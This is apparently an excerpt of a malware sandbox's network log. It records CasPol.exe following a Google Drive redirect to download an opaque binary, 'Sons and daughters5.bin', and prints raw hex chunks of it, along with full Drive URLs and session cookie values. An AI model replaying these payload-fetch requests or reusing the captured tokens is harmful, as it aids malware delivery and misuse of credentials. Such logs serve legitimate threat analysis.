X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                    Access-Control-Allow-Methods: GET,OPTIONS
                                                                                    P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info."
                                                                                    Location: https://docs.google.com/nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e%3Ddownload&hash=hqfbg0brbd0h8lf3lvpl1nnp6d5151ib
                                                                                    Date: Tue, 23 Nov 2021 13:42:43 GMT
                                                                                    Expires: Tue, 23 Nov 2021 13:42:43 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    Content-Length: 0
                                                                                    Server: UploadServer
                                                                                    Set-Cookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0_nonce=s94nbloa4nc92; Domain=doc-04-3g-docs.googleusercontent.com; Expires=Tue, 23-Nov-2021 13:52:43 GMT; Path=/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6; Secure; SameSite=none; HttpOnly
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.11.2049843172.217.168.14443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:42:43 UTC215OUTGET /nonceSigner?nonce=s94nbloa4nc92&continue=https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e%3Ddownload&hash=hqfbg0brbd0h8lf3lvpl1nnp6d5151ib HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Connection: Keep-Alive
                                                                                    Host: docs.google.com
                                                                                    Cookie: NID=511=O2-FXr5qY76nLIjQxvu2_dNxwEtEAZmUxKDF6y584Qjx7NM545C5PIS_SocNxTJxEK5_KchPEN01o4qyMmQxmKaggD7ecYWx2bdodOikTvrlJfMoyHbS4cvhS_Kk8QF7TyLxZO5NB5GVwXIvTg82PL1VoDOvxQvyU_6Z1TC1nUE
                                                                                    2021-11-23 13:42:43 UTC216INHTTP/1.1 302 Found
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Tue, 23 Nov 2021 13:42:43 GMT
                                                                                    Location: https://doc-04-3g-docs.googleusercontent.com/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download&nonce=s94nbloa4nc92&user=08866698715000929587Z&hash=ot9mkg4h11n1q8q8tl3fed9t5609m7ab
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentSignerHttp/cspreport
                                                                                    Content-Security-Policy: script-src 'nonce-+lGPXaiMABU0SJALCjS3nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentSignerHttp/cspreport;worker-src 'self'
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    5192.168.11.2049844142.250.185.161443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-11-23 13:42:43 UTC217OUTGET /docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6/mqftof4tr6k7gid13k6q6ikogfpd1k2d/1637674950000/14482752613682931361/08866698715000929587Z/1oM9hn-PPsGzsYLC6phCcZPr7HMtVKRgX?e=download&nonce=s94nbloa4nc92&user=08866698715000929587Z&hash=ot9mkg4h11n1q8q8tl3fed9t5609m7ab HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                    Cache-Control: no-cache
                                                                                    Connection: Keep-Alive
                                                                                    Host: doc-04-3g-docs.googleusercontent.com
                                                                                    Cookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0_nonce=s94nbloa4nc92
                                                                                    2021-11-23 13:42:43 UTC218INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ADPycdumYzUqmXSEuHn1E6r2xUtP4nmxNMjENPCVummySzMsT4Jw0n7SPqg113XF5d8LBidYNaGti7OAjINcHZii9Zw
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                                                                    Access-Control-Allow-Methods: GET,OPTIONS
                                                                                    P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/answer/151657?hl=en for more info."
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Disposition: attachment;filename="Sons and daughters5.bin";filename*=UTF-8''Sons%20and%20daughters5.bin
                                                                                    Content-Length: 207936
                                                                                    Date: Tue, 23 Nov 2021 13:42:43 GMT
                                                                                    Expires: Tue, 23 Nov 2021 13:42:43 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=nwHAxw==
                                                                                    Server: UploadServer
                                                                                    Set-Cookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0=08866698715000929587Z|1637674950000|oi06qm5ps09ba9vtmvui6gpdeopbgkfu; Domain=.googleusercontent.com; Expires=Tue, 23-Nov-2021 13:47:43 GMT; Path=/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6; Secure; SameSite=none; HttpOnly
                                                                                    Set-Cookie: AUTH_9aqatk3osmsaaots2gjte2gg27aqr5r0_nonce=; Domain=doc-04-3g-docs.googleusercontent.com; Expires=Mon, 22-Nov-2021 13:42:43 GMT; Path=/docs/securesc/m3j9najiejndjck0dhvpff742spjj7o6; Secure; SameSite=none; HttpOnly
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                    Connection: close
                                                                                    2021-11-23 13:42:43 UTC222INData Raw: f5 ef 03 ce 5b 17 1f b1 0d 53 b4 ca ba 68 c0 6b 7a 9c 07 d9 1d 84 3c db 83 31 26 fe f8 41 08 ad dc b4 9a ce d4 b8 40 c3 2a 51 84 6e f5 33 f4 30 15 23 68 53 32 68 88 da dc 09 9f a6 2a db 9c b0 23 81 90 de ba be 78 45 ac 2a 11 0a 23 57 c8 77 1f 1e d2 50 b3 b6 8b 48 51 60 7a bb 5f fa 2f 24 e1 fd b7 95 61 49 dc 83 5a 43 f5 53 f0 c8 eb 22 f4 0b 0e 31 5f 29 e1 cd 93 69 82 e5 c9 5b 86 f0 ad f9 7f 2f 3e 70 43 45 73 18 e6 7f db 38 b6 35 4b 85 c2 bc 0a 7b 55 21 c3 d9 99 7c 6e c9 3c f7 45 5d bc a4 76 85 da a0 13 5b db a2 37 84 46 3d 6e 0a 45 d9 ed 64 a1 a9 db 56 0d 26 13 10 ef 4e 7d 91 f5 d4 65 af f8 dc 9d 69 9d 04 1b b0 f7 ab eb 7e 69 99 18 08 98 a8 48 17 97 12 f5 96 e3 03 6d 01 e5 4e 3e 95 8b ab 5b f1 2f 85 23 fb 24 70 d6 88 05 72 74 08 d0 7c 2c 79 40 88 76 64 0a
                                                                                    Data Ascii: [Shkz<1&A@*Qn30#hS2h*#xE*#WwPHQ`z_/$aIZCS"1_)i[/>pCEs85K{U!|n<E]v[7F=nEdV&N}ei~iHmN>[/#$prt|,y@vd
                                                                                    2021-11-23 13:42:43 UTC226INData Raw: 33 e4 4c f4 9e 5e b2 42 24 d6 cb ea c5 9e ee 11 2b 9c a4 fa 9d fa 12 19 78 d7 75 b8 39 d5 d9 71 7f ea 20 a8 bf 09 34 1b 13 33 f9 6d 6c b7 f9 3a 8e 26 07 00 a9 80 f1 1a 33 48 c6 f3 1c 0c 44 ff 99 b5 4a 7d a6 c6 02 cc 05 46 2c f4 40 0e 7d 74 79 2c 47 1c d9 89 57 ef 5a f6 29 77 21 28 5d 97 a8 99 1f ea b8 5c a0 8d 1b e6 f2 74 b4 bb 04 45 ee 4a bc 1d 4a 5a f7 f4 50 c8 7f 51 48 50 a7 49 2f 73 48 9b a7 83 bf f6 a0 b2 5a 48 38 5f 90 6d 8c c5 b1 f1 a4 a0 e7 5a 1a 49 e6 9b 75 17 6e b4 9c 26 13 2e 3e 0d c8 34 c2 8b 5a 23 1a c7 2b 1e 46 10 5b d0 43 2b 5a b2 4b 11 6b 40 0a 65 3e 8c 87 c7 22 b8 e0 91 6a c7 f8 d7 da b2 af 1b 3f c0 78 dc 34 bb 66 b0 cc 6e f0 7e 77 78 fe 11 fd 40 b2 b2 0a 89 39 6e f1 e7 35 b8 9c ea 25 a4 67 90 d0 17 8e 11 8f cf 26 11 fe c7 d4 41 f0 44 ae
                                                                                    Data Ascii: 3L^B$+xu9q 43ml:&3HDJ}F,@}ty,GWZ)w!(]\tEJJZPQHPI/sHZH8_mZIun&.>4Z#+F[C+ZKk@e>"j?x4fn~wx@9n5%g&AD
                                                                                    2021-11-23 13:42:43 UTC231INData Raw: 9a 3d 2e 62 ca 8e 53 07 d5 5e e9 6f e0 c8 df 40 e5 15 66 b4 fc 44 33 f6 e3 8a 5f bf 01 ec 19 19 fe 60 db 00 de b9 be 78 58 a8 9d c5 0a fc ee c8 77 a6 05 e2 53 b3 03 8b 48 11 4c 7a bb 4e da c9 05 31 e3 9f 6a 61 49 da ab ef 43 f5 55 8e e4 eb 22 f0 64 be 31 5f 23 fc e0 95 4f ba 8a 49 5b 86 fd 88 1e d7 22 16 75 4a 88 58 b6 cb 6f 30 0b e3 75 9c f6 e2 c6 62 39 66 75 d1 98 b9 1f 09 ab 5a 8a 31 06 fe c1 56 f3 d2 de 33 32 b1 8a 61 cb 6e 02 03 65 25 c1 d2 69 ac a7 f7 41 70 34 13 10 eb 46 3f d4 8e f6 29 ae ff a1 2f 4e 74 54 13 a2 f7 d0 ca 7e 69 9d 85 1c 96 a9 47 04 91 69 d7 5e e2 07 65 4b ca 4f 3e 93 a0 ad c2 3d 8c 8f 08 71 36 73 fe 3b 07 72 7e 25 1b a2 22 4b 43 76 60 70 0a a1 6d 23 fe 4c 41 dd ad 7d 66 b3 33 f3 28 a8 ce 9d ca 1f 80 07 a5 67 6a 15 16 b9 39 39 73 25
                                                                                    Data Ascii: =.bS^o@fD3_`xXwSHLzN1jaICU"d1_#OI["uJXo0ub9fuZ1V32ane%iAp4F?)/NtT~iGi^eKO>=q6s;r~%"KCv`pm#LA}f3(gj99s%
                                                                                    2021-11-23 13:42:43 UTC234INData Raw: ca 88 71 95 0b 7a ca 6f cd c8 df 40 2c 38 54 96 dc 04 4f c9 33 94 75 40 47 ec 74 80 4a 6e db 06 f6 d8 be 78 4f 76 29 1d 21 3a ae e2 77 ad 1f c2 50 b3 b6 8b 6f 11 69 4a bb 7b bc 2f 24 e0 e6 87 96 61 36 dc 83 5a 7f f5 53 e1 e0 1d 22 f4 01 17 1c 48 0f e3 ed 96 4a 52 fb 61 a4 86 f0 a5 ce 6d 21 3e ce 50 a5 54 86 cc 35 1d 32 05 51 09 f6 ea e4 d6 14 32 59 8e a8 b1 37 a0 a7 52 92 2b 50 ce e7 5f e1 87 39 33 32 bf aa 8b cb 15 17 08 bb 16 b1 e8 87 a4 b1 fe 7e f4 26 13 1a c7 b4 2d d4 ff fc 91 ae fb d6 e2 6e 51 78 57 b0 f7 a1 f8 7a 78 9d d8 3b b5 79 5d 3e 6e 12 f5 58 ca b7 6d 63 e2 66 5f 95 8b a1 17 16 29 af 5d da 34 70 d6 88 07 57 74 30 cd 7c 0c 1f 40 88 77 7d 3a a2 76 20 9d 4c 41 ea 71 03 5b cd 4e f7 47 13 ee 4d e4 e5 90 2f 5a 66 7a 13 3e 13 39 36 79 b5 48 41 c0 e5
                                                                                    Data Ascii: qzo@,8TO3u@GtJnxOv)!:wPoiJ{/$a6ZS"HJRam!>PT52Q2Y7R+P_932~&-nQxWzx;y]>nXmcf_)]4pWt0|@w}:v LAq[NGM/Zfz>96yHA
                                                                                    2021-11-23 13:42:43 UTC235INData Raw: c1 c5 bd 9f 75 6d 77 f8 b5 bd 98 fb 62 f2 82 8d e3 78 a1 49 e0 99 78 20 76 e9 8f 0e f7 2a 45 11 d1 19 d5 a8 63 90 19 a8 25 35 46 1a 77 c4 58 2b 51 96 98 1d 40 a4 19 61 15 65 8a d8 60 b6 c7 b9 fe d1 06 d0 fd 9d 8e 32 1d ff 78 0d 34 bb 6a 89 c9 6c c5 5a e1 c6 2e 0f d5 a7 b2 b2 1d b8 00 d5 f1 e1 1c c7 a6 95 2f 7a 67 a0 fc 07 74 25 8e df 27 39 b8 c7 d4 4b 05 15 b9 51 e0 e8 ab 0d b5 19 82 29 46 6f 42 ff 6c 67 4f 67 b7 e0 c6 4a d6 87 17 66 e7 9a d6 61 0d ea 2a f9 9a 1a 05 12 c8 53 87 29 29 86 21 18 06 b3 eb 45 91 05 86 98 4b fd 11 3e 47 cd 31 b3 b6 d5 0a ed 9b 21 37 89 75 e3 a8 70 d3 8e 2f c6 b3 e9 67 72 dd 3c 75 34 0c 95 8b a7 51 ba c0 00 7c 41 23 87 84 4e 5b e1 12 e0 76 1b ae dd 5f c7 cf f1 97 e3 e2 ad 9d ed a0 bd ff fe 0d cc 4b 96 c2 24 6d f8 f4 44 b5 38 52
                                                                                    Data Ascii: umwbxIx v*Ec%5FwX+Q@ae`2x4jlZ./zgt%'9KQ)FoBlgOgJfa*S))!EK>G1!7up/gr<u4Q|A#N[v_K$mD8R
                                                                                    2021-11-23 13:42:43 UTC236INData Raw: 67 ba 15 29 6e 1c e5 4f cc 1e 66 0d 8e 93 5f 3d 5a bb 39 3c 7e a1 45 92 c0 32 5b 78 26 04 30 c3 2d 8d 01 ce ab a8 f4 f9 34 57 d4 29 35 85 a2 2a 8b a6 02 06 26 a7 cf af e8 7c d8 86 7e ef bb 2c c2 d8 d6 37 ee 0a c5 b2 c9 88 2c 7a 82 88 dc 45 ff 28 f2 41 8a a3 4b 25 2f de 45 1a 36 b0 c1 c6 56 ba 17 9c 5a d1 34 2c 87 db 42 93 77 e6 77 6f 84 e1 0b 52 14 dc bc 18 b7 1d b3 25 7f 3b 02 bc cf 2c 5f 23 ac 4c 93 52 0d a4 21 8c 63 a7 c0 a8 83 dd 9d 2e 19 e4 4e f1 b9 77 a0 70 04 25 ed 31 db b6 00 6f 12 9a 8c 4a 9e e0 01 ea 70 d7 31 26 11 99 d3 5b 53 e9 b6 86 c1 40 ea 1b 15 45 4f 41 64 97 fb b3 be 21 01 5e aa a6 da fb 1b 0b d6 f6 37 01 98 84 82 bf 62 a6 86 48 24 34 18 6f d3 fe 5c 25 06 26 51 a4 4d 3c 88 7b 88 d7 59 ff 01 3b 27 00 e4 bf c9 9f 35 9e 25 5c 8a 89 16 e1 f8
                                                                                    Data Ascii: g)nOf_=Z9<~E2[x&0-4W)5*&|~,7,zE(AK%/E6VZ4,BwwoR%;,_#LR!c.Nwp%1oJp1&[S@EOAd!^7bH$4o\%&QM<{Y;'5%\
                                                                                    2021-11-23 13:42:43 UTC238INData Raw: c7 cb e2 92 f2 e7 96 05 cc 70 3a d7 01 0d 81 4d be 67 5a 57 fe dc 21 8c b6 58 ac 35 d8 84 70 78 7e 50 45 50 96 98 ed b6 24 83 0a 6e f3 bc 6c ee b3 84 6b eb 62 ca 8c 14 ed d5 5e e5 5f ac cb f9 61 74 19 67 4b c6 26 1a b5 e3 8a 57 a6 6a e7 54 ae 85 7b db 00 da 94 b9 53 46 a2 01 e2 21 ee ae b3 62 a7 1e d6 52 dc 99 8b 48 17 be 5e 9e 77 b6 2f 24 eb f6 b1 ee 74 49 dc 87 5d 63 94 75 20 d6 c3 dd f4 0b 08 19 ec 29 e1 cb bb 08 82 e5 43 85 86 e2 a1 ce a7 21 3e ce 67 23 8c ae f5 31 e8 0f ec 5d 22 ed 8d af 78 14 38 8f 88 b4 b1 1f 0e bb 52 98 31 7d 93 c1 58 ac af ea 75 32 b5 83 71 cb 35 1d 69 ef 21 b2 c3 69 ac a3 e4 66 09 26 6d 10 ef 4e 60 d4 f5 c5 57 94 fb dc 38 21 2a 50 1b ba e9 86 e8 58 42 cd f4 23 6d bb 41 3e ce 12 f5 54 f9 2e 66 45 e2 35 2b 95 8b af e4 11 05 86 29
                                                                                    Data Ascii: p:MgZW!X5px~PEP$nlkb^_atgK&WjT{SF!bRH^w/$tI]cu )C!>g#1]"x8R1}Xu2q5i!if&mN`W8!*PXB#mA>T.fE5+)
                                                                                    2021-11-23 13:42:43 UTC239INData Raw: 14 4b 47 9b a5 87 f5 70 66 1b 77 27 06 30 bd 8d b7 79 94 fb 56 bc a4 1e ed ff 29 a2 93 71 41 e9 60 f7 1c b1 47 d5 20 a3 b6 40 79 fb 54 a4 20 75 12 48 91 81 74 c2 c4 8b 52 4c 49 7f 4e 90 6d 8c fe 38 2c 8c 99 e6 ae 27 47 e0 9f 78 62 0f cf 87 2c cf 00 45 1d e0 35 da 8e 72 94 1a f0 2d 3a 03 10 71 95 73 21 5b bf 4b 1b 6b 30 70 65 30 8f 9b dc 0f ac f6 bb f4 87 f8 d1 f0 c5 84 ec 2e d9 78 6c 35 bb 66 86 e1 66 e6 68 77 98 7c 11 fd 5c f7 b1 1b 90 b4 d2 f1 e7 34 a9 a6 95 25 b3 67 b6 d6 2a 5d 0a a4 2c 0c 2f be ef da 4a 52 44 92 7f a0 c0 b1 0c ae 2f aa 2f 3b 47 94 ff 2e 61 65 6d a7 6b e3 0d c8 af e8 34 e7 9c c5 4a 79 c7 2b f3 8a 2b 03 26 ce 85 cd 70 36 ae d8 63 0b b5 ec 69 19 28 80 b8 7e d6 00 33 a3 ef fe b3 b0 f2 05 c2 e7 8e 27 8d 70 f7 ac 71 d3 80 04 f9 2a e3 6c 5f
                                                                                    Data Ascii: KGpfw'0yV)qA`G @yT uHtRLINm8,'Gxb,E5r-:qs![Kk0pe0.xl5ffhw|\4%g*],/JRD//;G.aemk4Jy++&p6ci(~3'pq*l_
                                                                                    2021-11-23 13:42:43 UTC240INData Raw: 99 f2 76 a9 a9 43 12 fe 20 f4 5e e8 28 6e 68 cf ab 40 d5 8b ab cd 3a 32 ad 16 da 24 7a fe ab 06 72 7e 03 82 7d 04 6a 41 88 7c 4e 3c a0 76 46 b5 79 40 d7 7b 23 13 9b e3 e9 6f e8 ce 9d c6 1d ad 06 a5 6c f6 27 16 bb 38 1e 2f a8 65 40 ec 9c 04 50 d9 00 1c d3 7b 06 01 ce a9 86 fa ce 35 5d 00 57 1c af a4 04 f7 f9 37 17 26 ad b1 ef e8 7c 94 e2 72 f7 d5 14 c3 d9 df 05 cc 3c dd b2 c3 a0 0f 7b 82 82 5f 60 e2 05 e7 4d e5 a6 7a 23 25 b0 03 1a 36 e7 e9 5f 47 b9 15 b3 7b f4 dd 04 ab da 41 a5 68 cb 6a 49 86 e7 64 f3 15 dc b9 24 a7 1b 4a 03 10 3f 33 ba c5 1f c6 23 ac 1d b9 74 37 55 2e b9 69 a3 ab ad ab f1 9c 2e 1f fd 61 ee 88 58 b4 39 85 d7 cb e7 ef 94 d4 9a 12 8f 94 f8 9e d7 07 34 7f e6 1a ca 28 c1 c4 76 49 e7 a9 bf c1 4a 30 19 78 2e 5a 6c 66 9d f7 02 bd 2b 2c 9b d7 b9
                                                                                    Data Ascii: vC ^(nh@:2$zr~}jA|N<vFy@{#ol'8/e@P{5]W7&|r<{_`Mz#%6_G{AhjId$J?3#t7U.i.aX94(vIJ0x.Zlf+,
                                                                                    2021-11-23 13:42:43 UTC241INData Raw: 08 18 df e5 d5 b3 ed df 16 d1 a0 24 27 8d 7c 92 8d 7b f5 fa 37 d1 98 e7 40 53 25 33 54 fb eb b9 1a 4d 40 b8 d1 4a 7d 41 2d a8 11 4f 56 e8 66 7d 54 3e 82 fe d1 c6 c5 e4 bf f3 cd 8b 4b 86 70 a3 d3 29 31 cd 4d b4 63 09 7f d8 ce 24 9d 05 59 ac 3f 8e f3 71 78 7c 11 70 7c aa 81 cb 9e ee 82 0b f5 ea a2 4a ec e6 cd 15 d1 66 e2 b4 7a b3 df 55 fd 46 a9 f5 de 4a 31 3d 09 b1 d4 22 5e dd f6 a1 5a 3f 09 ec 72 ac d5 b2 a5 43 de b9 ba 17 e6 a9 2a 17 21 d9 80 df 76 a7 18 f8 43 83 b5 8b 71 11 60 7a e7 5f fa 3e 04 c1 b3 b7 95 49 97 dc 83 50 63 f4 53 f0 48 f1 0f fe 2d 26 0e 5e 29 e7 e1 81 42 81 ef 62 af 80 ef e3 86 d3 0d 3d e2 61 8b 58 8b e7 35 3e dd e2 5d 24 d0 ca 71 78 14 34 79 a2 b4 b9 55 1b 59 54 27 31 7d d8 b2 4d f6 af c8 5c 2c b4 82 75 e1 15 1e 33 6c 21 9f c3 69 ac a3
                                                                                    Data Ascii: $'|{7@S%3TM@J}A-OVf}T>Kp)1Mc$Y?qx|p|JfzUFJ1="^Z?rC*!vCq`z_>IPcSH-&^)Bb=aX5>]$qx4yUYT'1}M\,u3l!i
                                                                                    2021-11-23 13:42:43 UTC243INData Raw: 39 d5 c0 5b 59 d0 d4 83 c5 62 73 1b 17 5a 24 ea 6c b1 d7 3e a6 3b 1f f8 db 80 f1 0c 2a 65 cb d0 37 3f 44 08 ca b5 4a 78 24 4e 39 19 95 d9 5f b8 40 08 0f a2 7f 04 f5 3c 8e a3 ad fb 59 eb 3a 47 2f 00 d6 97 a8 9f 52 94 fb 4d a3 8d 05 e3 bf 52 b7 95 6b 68 c9 66 ef bd 61 59 f9 c8 bb ad 5e dc 3a 54 a4 27 4a 5e 50 b7 8c bc c3 43 e8 b2 5e 4a f5 2b 87 6b 24 d4 b5 4a 82 8b e2 7a 3b 62 37 94 48 eb 6f ff 8e 26 02 2a 45 1b c8 34 c6 8e 01 63 1a c7 2b 2d 6b 12 7d f9 f3 74 5a bd 4f 3a 93 40 0a 65 25 bf 9f dc ca be c6 b9 9c c7 f8 c0 d8 ab 85 ec 35 0a 49 41 34 b9 48 dc cc 7d ca 15 37 e2 fe 1b ce 5f 9a 57 1b 90 b2 f8 fb c6 ee 2b 53 d5 26 cc 8c f3 fc 7f 0b 00 8f cb 02 20 95 cf f2 63 db 42 b9 7b 8d ec b8 07 85 dc ff 7c 3d 6f 46 90 d6 67 4f 70 8a 42 e8 bc ce b9 82 26 84 9d d4
